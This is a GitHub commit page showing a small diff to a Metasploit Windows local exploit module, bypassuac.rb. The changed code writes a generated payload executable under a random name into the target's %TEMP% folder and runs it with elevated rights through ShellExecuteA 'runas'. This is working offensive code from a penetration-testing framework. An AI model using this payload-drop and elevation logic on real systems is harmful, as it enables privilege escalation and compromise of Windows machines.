Skip to content

Commit

Permalink
add some output and fixing
Browse files Browse the repository at this point in the history
  • Loading branch information
@mubix
mubix committed Oct 7, 2013
1 parent 75d2abc commit aed2490
Showing 1 changed file with 7 additions and 2 deletions.
9 changes: 7 additions & 2 deletions modules/exploits/windows/local/bypassuac.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -44,8 +44,13 @@ def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = session.fs.file.expand_path("%TEMP%")
session.fs.file.upload_file("#{tmpdir}\\#{payload_filename}", payload)
session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
tempexe = tmpdir + "\\" + payload_filename
fd = session.fs.file.new(tempexe, "wb")
fd.write(payload)
fd.close
print_status("Uploading payload: #{tmpdir}\\#{payload_filename}")
session.railgun.shell32.ShellExecuteA(nil,"runas","#{tmpdir}\\#{payload_filename}",nil,nil,5)
print_status("Payload executed")
end

def exploit
Expand Down

0 comments on commit aed2490

Please sign in to comment.